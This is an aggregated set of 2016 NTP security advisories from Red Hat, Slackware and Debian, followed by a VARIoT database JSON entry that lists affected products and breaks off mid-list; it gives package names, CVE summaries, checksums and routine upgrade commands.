noarch: ntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm ntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm sntp-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: ntp-4.2.6p5-22.el7_2.2.src.rpm
x86_64: ntp-4.2.6p5-22.el7_2.2.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm ntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm ntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm sntp-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: ntp-4.2.6p5-22.el7_2.2.src.rpm
ppc64: ntp-4.2.6p5-22.el7_2.2.ppc64.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64.rpm ntpdate-4.2.6p5-22.el7_2.2.ppc64.rpm
ppc64le: ntp-4.2.6p5-22.el7_2.2.ppc64le.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64le.rpm ntpdate-4.2.6p5-22.el7_2.2.ppc64le.rpm
s390x: ntp-4.2.6p5-22.el7_2.2.s390x.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.s390x.rpm ntpdate-4.2.6p5-22.el7_2.2.s390x.rpm
x86_64: ntp-4.2.6p5-22.el7_2.2.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm ntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm ntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm
ppc64: ntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64.rpm sntp-4.2.6p5-22.el7_2.2.ppc64.rpm
ppc64le: ntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64le.rpm sntp-4.2.6p5-22.el7_2.2.ppc64le.rpm
s390x: ntp-debuginfo-4.2.6p5-22.el7_2.2.s390x.rpm sntp-4.2.6p5-22.el7_2.2.s390x.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm sntp-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: ntp-4.2.6p5-22.el7_2.2.src.rpm
x86_64: ntp-4.2.6p5-22.el7_2.2.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm ntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch: ntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm ntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm sntp-4.2.6p5-22.el7_2.2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-7979 https://access.redhat.com/security/cve/CVE-2016-1547 https://access.redhat.com/security/cve/CVE-2016-1548 https://access.redhat.com/security/cve/CVE-2016-1550 https://access.redhat.com/security/cve/CVE-2016-2518 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFXTUp2XlSAg2UNWIIRAqUmAKC32P98McZUqU1gzWxBbCz0hn0eagCfRtrx SULnKXrtTJd5iJ6eQVtDnxA= =hETy -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz: Upgraded. This release patches several low and medium severity security issues: CVE-2016-1551: Refclock impersonation vulnerability, AKA: refclock-peering CVE-2016-1549: Sybil vulnerability: ephemeral association attack, AKA: ntp-sybil - MITIGATION ONLY CVE-2016-2516: Duplicate IPs on unconfig directives will cause an assertion botch CVE-2016-2517: Remote configuration trustedkey/requestkey values are not properly validated CVE-2016-2518: Crafted addpeer with hmode > 7 causes array wraparound with MATCH_ASSOC CVE-2016-2519: ctl_getitem() return value not always checked CVE-2016-1547: Validate crypto-NAKs, AKA: nak-dos CVE-2016-1548: Interleave-pivot - MITIGATION ONLY CVE-2015-7704: KoD fix: peer associations were broken by the fix for NtpBug2901, AKA: Symmetric active/passive mode is broken CVE-2015-8138: Zero Origin Timestamp Bypass, AKA: Additional KoD Checks CVE-2016-1550: Improve NTP security against buffer comparison timing attacks, authdecrypt-timing, AKA: authdecrypt-timing For more information, see: http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8138 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1547 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1548 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1550 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1551 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2516 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2517 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2518 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2519 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p7-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p7-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p7-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p7-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p7-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p7-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 785dc2ef5f80edb28dc781e261c3fe3f ntp-4.2.8p7-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: 899421096b7b63e6cb269f8b01dfd875 ntp-4.2.8p7-x86_64-1_slack13.0.txz
Slackware 13.1 package: dfd34cbd31be3572a2bcae7f59cdfd91 ntp-4.2.8p7-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 63c4b31736040e7950361cd0d7081c8b ntp-4.2.8p7-x86_64-1_slack13.1.txz
Slackware 13.37 package: e760ae0c6cc3fa933e4d65d6995b0c84 ntp-4.2.8p7-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: aa448523b27bb4fcccc2f46cf4d72bc5 ntp-4.2.8p7-x86_64-1_slack13.37.txz
Slackware 14.0 package: 3bc7e54a4164a4f91be996b5cf2e643e ntp-4.2.8p7-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 0f6ea4dae476709f26f5d0e33378576c ntp-4.2.8p7-x86_64-1_slack14.0.txz
Slackware 14.1 package: dbe827ee7ece6ce5ca083cdd5960162c ntp-4.2.8p7-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 89f3edf183a6a9847d69b8349f98c901 ntp-4.2.8p7-x86_64-1_slack14.1.txz
Slackware -current package: 4018b86edd15e40e8c5e9f50d907dcff n/ntp-4.2.8p7-i586-1.txz
Slackware x86_64 -current package: 7dd6b64ba8c9fdaebb7becc1f5c3963d n/ntp-4.2.8p7-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8p7-i486-1_slack14.1.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address.
CVE-2015-7977 / CVE-2015-7978
Stephen Gray discovered that a NULL pointer dereference and a
buffer overflow in the handling of "ntpdc reslist" commands may
result in denial of service.
CVE-2016-2518
Yihan Lian discovered that an OOB memory access could potentially
crash ntpd.
For the stable distribution (jessie), these problems have been fixed in version 1:4.2.6.p5+dfsg-7+deb8u2.
For the testing distribution (stretch), these problems have been fixed in version 1:4.2.8p7+dfsg-1.
For the unstable distribution (sid), these problems have been fixed in version 1:4.2.8p7+dfsg-1.
We recommend that you upgrade your ntp packages
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201701-0399", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "linux", "scope": "eq", "trust": 1.3, "vendor": "oracle", "version": "6" }, { "model": "linux", "scope": "eq", "trust": 1.3, "vendor": "oracle", "version": "7" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.3, "vendor": "redhat", "version": "7.2" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.3, "vendor": "redhat", "version": "7.2" }, { "model": "ntp", "scope": "eq", "trust": 1.3, "vendor": "ntp", "version": "4.2.8" }, { "model": "freebsd", "scope": "eq", "trust": 1.0, "vendor": "freebsd", "version": "9.3" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.5" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "10.0" }, { "model": "communications user data repository", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "10.0.1" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.7" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.2" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "communications user data repository", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "10.0.0" }, { "model": "ntp", "scope": "gte", "trust": 1.0, "vendor": "ntp", "version": "4.3.0" }, { "model": "oncommand balance", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.4" }, { "model": "communications user data repository", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.0.0" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.4" }, { "model": "oncommand performance manager", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "simatic net cp 443-1 opc ua", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "*" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.7" }, { "model": "clustered data ontap", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "oncommand unified manager for clustered data ontap", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "9.0" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "ntp", "scope": "lt", "trust": 1.0, "vendor": "ntp", "version": "4.2.8" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "ntp", "scope": "lt", "trust": 1.0, "vendor": "ntp", "version": "4.3.92" }, { "model": "freebsd", "scope": "eq", "trust": 1.0, "vendor": "freebsd", "version": "10.1" }, { "model": "freebsd", "scope": "eq", "trust": 1.0, "vendor": "freebsd", "version": "10.3" }, { "model": "freebsd", "scope": "eq", "trust": 1.0, "vendor": "freebsd", "version": "10.2" }, { "model": "data ontap", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "ntp", "scope": "eq", "trust": 0.9, "vendor": "ntp", "version": "4.3.90" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ntp", "version": null }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "4.3.92" }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.3.x" }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": null }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "4.2.8p9" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.84" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.82" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.85" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.89" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.91" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.87" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.81" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.86" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.88" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "physical access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.77" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "dcm series 9900-digital content manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.9" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.25" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.6" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.0" }, { "model": "4.2.8p4", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.20" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.4" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.0" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "identity services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.1" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "4.2.8p6", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.18" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.16" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "4.2.7p11", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.7" }, { "model": "p153", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "video delivery system recorder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3210" }, { "model": "p7-rc2", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "p150", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "4.2.5p186", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.8" }, { "model": "network device security assessment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa cx and cisco prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.3" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "4.2.5p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.2" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "standalone rack server cimc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.2" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.19" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.8" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "prime infrastructure standalone plug and play gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unity express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "content security appliance updater servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.70" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.5" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "p8", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.1.0" }, { "model": "4.2.8p5", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0" }, { "model": "telepresence exchange system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "4.2.8p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.2.0" }, { "model": "prime access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "scos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.9.0" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "4.2.7p111", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security privileged identity manager fixpack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.0.28" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.6" }, { "model": "support central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": 